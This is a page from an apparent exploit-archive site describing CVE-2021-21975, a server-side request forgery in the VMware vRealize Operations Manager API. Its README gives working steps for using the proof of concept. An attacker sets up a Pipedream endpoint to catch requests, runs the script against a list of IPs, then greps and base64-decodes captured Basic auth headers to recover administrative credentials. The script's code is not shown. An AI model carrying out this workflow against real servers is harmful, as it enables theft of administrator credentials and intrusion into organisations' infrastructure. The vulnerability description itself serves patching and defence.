Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-21975 PoC — VMware vRealize Operations 代码问题漏洞

Source
Associated Vulnerability
Title:VMware vRealize Operations 代码问题漏洞 (CVE-2021-21975)
Description:Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
Readme
# CVE-2021-21975

#SSRF-POC - ssrf to cred leak

#First configure pd client.

#Now run ./pd deploy http-new-requests

#now replace the pipedream http request ex: Randomstring.m.pipedream.net in the script

#run this in a seperate terminal - ./pd logs new-requests | tee -a req.txt

#and now run this in another terminal  - python3 CVE-2021-21975.py iplist

#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt
; base64 -d basic_uniq.txt 


"This is a early proof of concept created when the vulnerability went public at the time months ago, so use it on your own risk." :V

#credit
@wabaf3t
@D0rkerDevil
File Snapshot

[4.0K] /data/pocs/cdae556002190fd296ffc4989c5f8d4595808098 ├── [2.2K] 𝘊𝘝𝘌-2021-21975.py └── [ 637] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →